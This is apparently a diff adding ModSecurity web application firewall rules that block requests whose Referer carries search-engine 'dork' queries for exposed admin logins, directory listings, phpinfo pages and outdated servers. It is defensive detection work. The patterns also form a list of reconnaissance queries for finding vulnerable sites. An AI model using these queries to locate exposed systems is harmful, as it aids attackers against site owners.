+SecRule REQUEST_HEADERS:Referer   "intitle:admin intitle:login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371443,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:wbem compaq login compaq information technologies group" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371448,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:usage statistics for generated by webalizer" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371453,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:statistics of advanced web statistics" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371454,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:phpinfo php version" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371470,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:ganglia cluster report for" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371477,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:badblue: the file-sharing web server anyone can use" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371479,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:apache status apache server status for" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371481,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(intitle:502 proxy error\)\|\(intitle:503 proxy error\) the proxy server could not handle the request -topic -mail -4suite -list -site:geocrawler\.com -site:elitesecurity\.org" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371484,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:welcome to 602lan suite \*" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371485,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:document title goes here intitle:used by web search tools  example of a simple home page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371486,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:welcome to your webstar home page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371487,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:welcome to the advanced extranet server" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371488,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:welcome to windows small business server 2003" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371489,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:ipc@chip infopage " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371491,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:welcome to mono xsp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371496,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:resin default home page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371502,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:welcome to xitami -site:xitami\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371503,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:welcome to your new home page! by the debian release" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371504,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:open webmail open webmail version \(2\.20\|2\.21\|2\.30\) " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371508,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:error 404 from rfc 2068 " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371509,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:directory listing" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371510,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:lotus domino go webserver: tuning your webserver -site:ibm\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371511,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:object not found netware apache 1\.\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371512,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:shoutcast administrator" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371515,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "httpd\+ssl/kttd \* server at intitle:index\.of" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371518,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "fitweb-wwws \* server at intitle:index.of" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371519,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "sedwebserver \* server \+at intitle:index.of" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371520,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "opensa/1\.0\.4 intitle:index.of" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371523,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "omnihttpd/2\.10 intitle:index.of" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371524,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "microsoft-iis/6\.0 intitle:index.of" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371525,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "microsoft-iis/4\.0 intitle:index.of" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371527,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "microsoft-iis/\* server at intitle:index.of" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371528,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "maxx/3\.1 intitle:index.of" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371529,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "jrun web server intitle:index.of" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371530,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "anweb/1\.42h intitle:index.of" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371532,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:test page for apache installation" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371539,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "allintitle:netscape fasttrack server home page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371540,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:test page for apache it worked! on this web" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371541,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:test page for apache it worked!" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371542,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "seeing this instead intitle:test page for apache" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371543,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:welcome to iis 4\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371548,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:welcome to windows 2000 internet services" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371549,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:apache http server intitle:documentation" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371550,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:cj link out v1" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371554,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:sshvnc appletor intitle:sshterm applet -uni-klu\.ac\.at -net/viewcvs\.py -iphoting\.iphoting\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371573,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:phpremoteview filetype:\.?php name" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371585,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:asp fileman resend -site:iisworks\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371586,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:mywebftp please enter your password" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371588,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:directory listing tree view" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371589,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "allintitle:firstclass login " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371611,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:folder listing folder listing name size date/time file folder" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371617,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:backup-management \(phpmybackup v\.0\.4 beta \* \)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371618,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:pictures thumbnails site:pictures\.sprintpcs\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371619,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:hfs / \+httpfileserver" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371626,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:webadmin " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371640,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:album permissions users who can modify photos everybody" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371650,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:ari phone system administrator" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371675,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(intitle:silkymail by cyrusoft international" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371680,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:ampache intitle:love of music  password \| login \| remember me\. -welcome" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371683,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:exist database administration -demo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371685,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(intitle:wmsc e-cart administration\)\|\(intitle:webmystyle e-cart administration\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371686,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:twig login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371690,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:\(trackercam live video\)\|\(trackercam application login\)\|\(trackercam remote\) -trackercam\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371692,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:employee intranet login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371696,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:ezpartner -netpond" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371699,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "bp blog admin intitle:login \| intitle:admin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371710,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:b2evo > login form login form\. you must log in! you will have to accept cookies in order to log in  -demo -site:b2evolution\.net" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371712,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:admin login web site administration copyright " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371713,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "establishing a secure integrated lights out session with or intitle:data frame - browser not http 1\.1 compatible or intitle:hp integrated lights-out login \| alert' panel is displayed" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371716,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:merak mail server web administration" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371719,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:\*- hp wbem login \| you are being prompted to provide login account information for \* \| please provide the information requested and press the ok button to complete the login process \| <!" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371723,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:extranet login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371724,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:extranet \* - identification " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371725,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:online recruitment program - login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371726,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:docutek eres - admin login -edu" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371727,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:idevaffiliate - admin -demo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371730,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:admin login admin login blogware -site:blogware\.com -filetype:html" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371732,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:i-secure v1\.1 -edu" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371735,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:phprojekt - login login password" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371737,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:content management system user name\|password\|admin microsoft ie 5\.5 -mambo" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371741,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:web-cyradm\|by luc de louw this is only for authorized users -tar\.gz -site:web-cyradm\.org" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371744,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:content management system user name\|password\|admin microsoft ie 5\.5 -mambo" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371746,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:xams 0\.0\.0\.\.15 - login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371748,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "hostingaccelerator intitle:login \+username -news -demo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371749,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inspanel intitle:login -cannot login id -site:inspediumsoft\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371750,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:communigate pro \* \* intitle:entrance" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371751,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:alternc desktop" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371752,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:phpnews\.login " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371753,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:cisco callmanager user options log on please enter your user id and password in the spaces provided below and click the log on button to continue\.  -edu" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371754,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:kerio" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371755,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
